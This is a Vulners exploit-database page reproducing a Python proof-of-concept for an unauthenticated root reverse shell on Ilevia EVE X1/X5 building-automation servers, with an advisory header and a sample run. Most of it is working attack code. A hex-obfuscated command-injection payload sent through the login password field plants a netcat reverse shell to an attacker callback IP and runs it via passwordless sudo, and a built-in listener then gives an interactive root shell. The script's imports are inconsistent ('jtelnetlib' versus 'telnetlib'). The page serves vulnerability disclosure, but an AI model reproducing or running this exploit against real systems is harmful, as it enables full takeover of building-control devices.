Vulners
Lucene search
Ilevia EVE X1/X5 Server 4.7.18.0.eden - Reverse Rootshell
#!/usr/bin/env python
#
#
# Ilevia EVE X1/X5 Server 4.7.18.0.eden Reverse Rootshell
#
#
# Vendor: Ilevia Srl.
# Product web page: https://www.ilevia.com
# Affected version: <= 4.7.18.0.eden (Logic ver: 6.00)
#
# Summary: EVE is a smart home and building automation solution designed
# for both residential and commercial environments, including malls, hotels,
# restaurants, bars, gyms, spas, boardrooms, and offices. It enables comprehensive
# control and monitoring of electrical installations through a highly customizable,
# user-friendly interface.
#
# EVE is a multi-protocol platform that integrates various systems within
# a smart building to enhance comfort, security, safety, and energy efficiency.
# Users can manage building functions via iPhone, iPad, Android devices, Windows
# PCs, or Mac computers.
#
# The EVE X1 Server is the dedicated hardware solution for advanced building
# automation needs. Compact and powerful, it is ideal for apartments, small
# to medium-sized homes, and smaller commercial installations. It is designed
# to manage entire automation systems reliably and efficiently.
#
# Desc: A misconfiguration in the sudoers file permits passwordless execution
# of specific Bash shell scripts via sudo, exposing a critical privilege escalation
# vulnerability. When such scripts are writable by a web-facing user (www-data) or
# accessible through a command injection vector, an attacker can overwrite or replace
# them with malicious payloads. Upon execution with sudo, these scripts run with
# elevated privileges, allowing the attacker to gain full root access remotely.
#
# ------------------------------------------------------------------------------
# $ python rewteve.py 10.0.0.18:8080 10.0.0.4 5555
# [+] Cyber-link active on 0.0.0.0:5555...
# [*] Firing at http://10.0.0.18:8080/ajax/php/login.php
# [+] Pulse from 10.0.0.18:46444
# [*] Probing matrix with 'pwd' signal...
# [+] Verifistring: /home/ilevia/www-config/http/ajax/php
# [*] Synaptic intrusion confirmed, escalating to holo-shell...
# # id
# uid=0(root) gid=0(root) groups=0(root)
# # exit
# [+] ilevia_reboot restored.
# ------------------------------------------------------------------------------
#
# Tested on: GNU/Linux 5.4.35 (armv7l)
# GNU/Linux 4.19.97 (armv7l)
# Armbian 20.02.1 Buster
# Apache/2.4.38 (Debian)
# PHP Version 7.3.14
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2025-5959
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5959.php
#
#
# 01.05.2024
#
import jtelnetlib # ._
import threading # ._
import requests # ._
import socket # ._
import time # ._
import sys # ._
def init_quantum(target_data):
if "http://" not in target_data and "https://" not in target_data:
target_data = "http://" + target_data
if ":" not in target_data.split("//")[1]:
target_data = target_data.rstrip("/") + ":80"
return target_data.rstrip("/")
def spark_neuroport(cyber_gate):
def neuro_core():
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind(("0.0.0.0", cyber_gate))
s.listen(1)
print(f"[+] Cyber-link active on 0.0.0.0:{cyber_gate}...")
conn, addr = s.accept()
print(f"[+] Pulse from {addr[0]}:{addr[1]}")
holo_term = telnetlib.Telnet()
holo_term.sock = conn
print("[*] Probing matrix with 'pwd' signal...")
conn.sendall(b"pwd\n")
time.sleep(0.5)
try:
data_stream = conn.recv(4096).decode(errors='ignore')
data_nodes = data_stream.splitlines()
if data_nodes and data_nodes[0].strip() == "pwd":
data_nodes.pop(0)
output = "\n".join(data_nodes).strip()
print("[+] Verifistring:", output)
if 'ilevia/www-config' in output:
print("[*] Synaptic intrusion confirmed, escalating to holo-shell...")
conn.sendall(b"script /dev/null -c /bin/sh\n")
time.sleep(0.5)
try:
_ = conn.recv(4096)
except:
pass
else:
print("[!] Expected neural path not detected. Holo-shell may be unstable.")
except Exception as e:
print(f"[!] Error in synaptic probe: {e}")
import select
while True:
try:
cmd = input("# ").strip()
if cmd == "exit":
conn.sendall(b"\x72\x6d\x20\x2f\x68\x6f\x6d\x65\x2f\x69\x6c\x65\x76\x69\x61\x2f"
b"\x77\x77\x77\x2d\x63\x6f\x6e\x66\x69\x67\x2f\x68\x74\x74\x70\x2f"
b"\x73\x68\x2f\x69\x6c\x65\x76\x69\x61\x5f\x72\x65\x62\x6f\x6f\x74"
b"\x3b\x6d\x76\x20\x2f\x68\x6f\x6d\x65\x2f\x69\x6c\x65\x76\x69\x61"
b"\x2f\x77\x77\x77\x2d\x63\x6f\x6e\x66\x69\x67\x2f\x68\x74\x74\x70"
b"\x2f\x73\x68\x2f\x69\x6c\x65\x76\x69\x61\x5f\x72\x65\x62\x6f\x6f"
b"\x74\x2e\x6f\x6c\x64\x20\x2f\x68\x6f\x6d\x65\x2f\x69\x6c\x65\x76"
b"\x69\x61\x2f\x77\x77\x77\x2d\x63\x6f\x6e\x66\x69\x67\x2f\x68\x74"
b"\x74\x70\x2f\x73\x68\x2f\x69\x6c\x65\x76\x69\x61\x5f\x72\x65\x62"
b"\x6f\x6f\x74\x0a")
print("[+] ilevia_reboot restored.")
break
if not cmd:
continue
conn.sendall((cmd + "\n").encode())
response = b""
conn.setblocking(0)
end_time = time.time() + 0.5 # max 1.5, collect output
while time.time() < end_time:
ready = select.select([conn], [], [], 0.1)
if ready[0]:
try:
chunk = conn.recv(8160)
if not chunk:
break
response += chunk
except:
break
else:
time.sleep(0.1)
conn.setblocking(1)
data_stream = response.decode(errors='ignore')
data_nodes = data_stream.splitlines()
clean_output = []
for line in data_nodes:
if line.strip() == cmd:
continue
if line.strip() in ["$", "#"]:
continue
clean_output.append(line)
if clean_output:
print("\n".join(clean_output).strip())
except Exception:
print("[!] Neural link terminated.")
break
conn.close()
cyber_thread = threading.Thread(target=neuro_core)
cyber_thread.start()
return cyber_thread
def fire_photon(target_matrix, cyber_origin, cyber_gate):
print(f"[*] Firing at {target_matrix}")
payload = (b"\x3b\x63\x70\x20\x2f\x68\x6f\x6d\x65\x2f\x69\x6c\x65\x76\x69\x61"
b"\x2f\x77\x77\x77\x2d\x63\x6f\x6e\x66\x69\x67\x2f\x68\x74\x74\x70"
b"\x2f\x73\x68\x2f\x69\x6c\x65\x76\x69\x61\x5f\x72\x65\x62\x6f\x6f"
b"\x74\x20\x2f\x68\x6f\x6d\x65\x2f\x69\x6c\x65\x76\x69\x61\x2f\x77"
b"\x77\x77\x2d\x63\x6f\x6e\x66\x69\x67\x2f\x68\x74\x74\x70\x2f\x73"
b"\x68\x2f\x69\x6c\x65\x76\x69\x61\x5f\x72\x65\x62\x6f\x6f\x74\x2e"
b"\x6f\x6c\x64\x3b\x65\x63\x68\x6f\x20\x22\x6d\x6b\x6e\x6f\x64\x20"
b"\x2f\x74\x6d\x70\x2f\x70\x69\x70\x65\x20\x70\x3b\x20\x2f\x62\x69"
b"\x6e\x2f\x73\x68\x20\x2d\x69\x20\x3c\x20\x2f\x74\x6d\x70\x2f\x70"
b"\x69\x70\x65\x20\x7c\x20\x6e\x63\x20" +# \xn#" #####
f"{cyber_origin}".encode() +# \x1#" #
b"\x20" +# :): \xn#" #
f"{cyber_gate}".encode() +# \xa#" #####
b"\x20\x3e\x20\x2f\x74\x6d\x70\x2f\x70\x69\x70\x65\x22\x20\x3e\x20"
b"\x2f\x68\x6f\x6d\x65\x2f\x69\x6c\x65\x76\x69\x61\x2f\x77\x77\x77"
b"\x2d\x63\x6f\x6e\x66\x69\x67\x2f\x68\x74\x74\x70\x2f\x73\x68\x2f"
b"\x69\x6c\x65\x76\x69\x61\x5f\x72\x65\x62\x6f\x6f\x74\x3b\x63\x68"
b"\x6d\x6f\x64\x20\x2b\x78\x20\x2f\x68\x6f\x6d\x65\x2f\x69\x6c\x65"
b"\x76\x69\x61\x2f\x77\x77\x77\x2d\x63\x6f\x6e\x66\x69\x67\x2f\x68"
b"\x74\x74\x70\x2f\x73\x68\x2f\x69\x6c\x65\x76\x69\x61\x5f\x72\x65"
b"\x62\x6f\x6f\x74\x3b\x73\x75\x64\x6f\x20\x2f\x68\x6f\x6d\x65\x2f"
b"\x69\x6c\x65\x76\x69\x61\x2f\x77\x77\x77\x2d\x63\x6f\x6e\x66\x69"
b"\x67\x2f\x68\x74\x74\x70\x2f\x73\x68\x2f\x69\x6c\x65\x76\x69\x61"
b"\x5f\x72\x65\x62\x6f\x6f\x74")
try:
requests.post(target_matrix, data={"userid":"inas","passwd":payload}, timeout=3)
print("[*] Photon fired.")
except requests.exceptions.ReadTimeout:
pass
except requests.exceptions.RequestException as e:
print(f"[!] Photon failed: {e}")
def boot_sequence():
if len(sys.argv) != 4:
print(f"Usage: {sys.argv[0]} <target_ip[:port]> <callback_ip> <callback_gate>")
print("Example: python eve.py 1.2.3.4:8080 5.6.7.8 5555")
sys.exit(1)
target_data = sys.argv[1]
cyber_origin = sys.argv[2]
try:
cyber_gate = int(sys.argv[3])
except ValueError:
print("[!] Cyber gate must be numeric.")
sys.exit(1)
target_matrix = init_quantum(target_data) + "/ajax/php/login.php"
neuro_thread = spark_neuroport(cyber_gate)
time.sleep(1)
fire_photon(target_matrix, cyber_origin, cyber_gate)
neuro_thread.join()
if __name__ == "__main__":
boot_sequence()Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
16 Sep 2025 00:00Current
7High risk
Vulners AI Score7